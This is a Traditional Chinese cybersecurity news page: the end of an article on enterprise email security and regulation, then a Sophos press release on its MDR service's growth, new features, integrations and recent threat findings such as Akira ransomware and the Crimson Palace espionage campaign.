值得注意的是，超過三分之二的IT領導者認為，安全供應商的創新速度趕不上新興風險的發展，這為市場留下了重要的發展空間。隨著各種法規如NIS2、GDPR、CCPA等的實施，以及行業特定規範如HIPAA的要求，企業必須重新審視其電子郵件安全策略。

展望未來，企業需要採取更全面的安全方案，將自動化工具、智慧控制和完善的監管機制相結合，確保電子郵件在保持其重要通訊功能的同時，不會成為企業安全的致命弱點。

      本文擷取自資安人

Sophos 宣布其 Sophos Managed Detection and Response (MDR) 服務已達成重要里程碑，目前全球保護超過 26,000 家組織，且 2024 年客戶數量成長高達 37%。這項成就突顯了市場對 Sophos 主動且由專家引領的安全解決方案需求日益成長，該解決方案能協助所有規模的組織全天候防禦日益複雜的網路威脅，包括最先進的勒索軟體攻擊、商業電子郵件詐騙 (BEC) 和網路釣魚攻擊。

Sophos MDR 提供一套全面的功能，不僅具有標準的威脅遏制，還涵蓋全方位的事件回應服務，包括根本原因分析、移除攻擊者使用的惡意工具或檔案，以及在客戶環境中進行深入調查，以確保完全驅逐攻擊者並防止再次攻擊。Sophos 的另一個顯著優點在於，這些事件回應服務皆包含於 Sophos MDR 中且無使用次數限制，客戶無需支付額外費用，事件回應工時也沒有上限。此外，Sophos MDR Complete 還提供一項高達 100 萬美元的資料外洩保障，可用於涵蓋事件回應相關費用。Sophos 還為客戶提供與 MDR 分析師合作的彈性選項，包括允許客戶預先授權分析師遏阻作用中的威脅。
Sophos 對 MDR 的投資與全新功能
Sophos 在其 MDR 服務上進行了大量投資，包括強化分析師陣容、引入 AI 輔助工作流程、新增功能以及擴展整合等，以便透過改進的威脅防護、偵測和調查，提供最佳的安全效果。Sophos 新增了以下全新功能：


價值證明：
全新的 Sophos MDR 服務見解，說明 MDR 團隊的行動，包括摘要出投入於威脅捕獵及建立與調整偵測功能的人力時數。非常有價值的儀表板強化功能，包括 Sophos MDR 團隊主動威脅捕獵中揭露的 MITRE ATT&CK 策略細節、MDR 分析師監控的範圍、案例調查摘要，以及一個帳戶健康檢查狀態。
 
針對 Microsoft 客戶的強化安全性：
全新 Sophos 專屬偵測功能適用於 Microsoft Office 365，能識別包括商業電子郵件詐騙和中間人帳戶接管攻擊等威脅，且不受限於客戶的 Microsoft 授權等級。
 
擴展與第三方的相容性：
擴大的即時整合生態系統，涵蓋與第https://www.informationsecurity.com.tw/article/article_detail.aspx?aid=11552三方網路安全和 IT 工具的整合，且新增「備份與復原」整合類別。
 
主動漏洞緩解：
Sophos Managed Risk 搭載 Tenable 技術，為 Sophos MDR 客戶提供全新的託管式服務選項，進行受攻擊面漏洞管理。
 
效率與自動化：
Sophos MDR 新增了以 AI 驅動的工作流程，簡化營運流程並提升安全效果。此創新透過更高效的優先排序降低了平均回應時間 (MTTR)，同時確保能快速調查所有真正的威脅。這讓分析師能專注於其他任務，例如威脅捕獵、帳戶健康監控以及偵測工程。

Sophos 產品管理資深副總裁 Rob Harrison 表示，攻擊者不斷改進攻擊策略，以避開傳統的安全防禦機制，我們的客戶依賴 Sophos MDR 來全天候協助它們應對當前的威脅，以及提供全方位的事件回應服務。Sophos MDR 不僅能移除作用中的攻擊者，還能進行根本原因分析，找出導致事件發生的潛在問題。我們持續透過全新的功能與整合來進化解決方案，就如攻擊者不斷改進其策略一樣，以確保客戶能在威脅升級為破壞性攻擊之前成功阻止它們。

更佳的整合：Sophos MDR 的整合功能 
Sophos 大幅投資第三方整合功能，讓 MDR 客戶能從更廣泛的工具和產品中接收並分析事件與警示，同時擴展針對 Microsoft 環境中可疑行為所識別的專屬偵測功能。這些整合包括：


全新備份與復原整合套件，包含與 Acronis、Rubrik 和 Veeam 的整合，以強化對勒索軟體的防禦能力。
 
Microsoft Office 365 管理活動整合，支援在 Microsoft 生態系統中接收稽核日誌與安全警示。目前已有超過 9,000 位客戶在 Sophos MDR 解決方案中使用此整合功能。


Sophos MDR 對當前威脅的分析
在過去 12 個月內，Sophos 分析了以下 MDR 案例並與客戶分享了調查結果：


2024 年 12 月，Sophos 發布了《內部威脅：Sophos 主動攻擊者報告》，深入剖析了攻擊者在 2024 年上半年使用的行為變化與攻擊技術。該數據來自近 200 起事件回應 (IR) 和 MDR 案例，顯示攻擊者正尋找利用受信任應用程式或「藉助現有二進位檔案」(LOLbins) 隱身的方法。Sophos 發現濫用這些應用程式的情況增加了 51%。
 
Sophos X-Ops 公布資訊，指出 Akira 勒索軟體案例在其 MDR 和事件回應 (IR) 客戶中呈現上升趨勢。自 2024 年 11 月以來，Sophos 已處理了 8 起相關案例，這些案例來自 Akira 在過去六個月內披露的 127 位受害者。
 
2024 年 6 月，Sophos MDR 公布了一項持續近兩年的網路間諜活動的詳細資料，該活動針對東南亞某高層政府機構。Sophos 將此行動命名為「紅宮行動 (Crimson Palace)」，其中涉及三個相互交疊的威脅活動集團，而這些活動與幾個知名的中國國家級攻擊團體有關。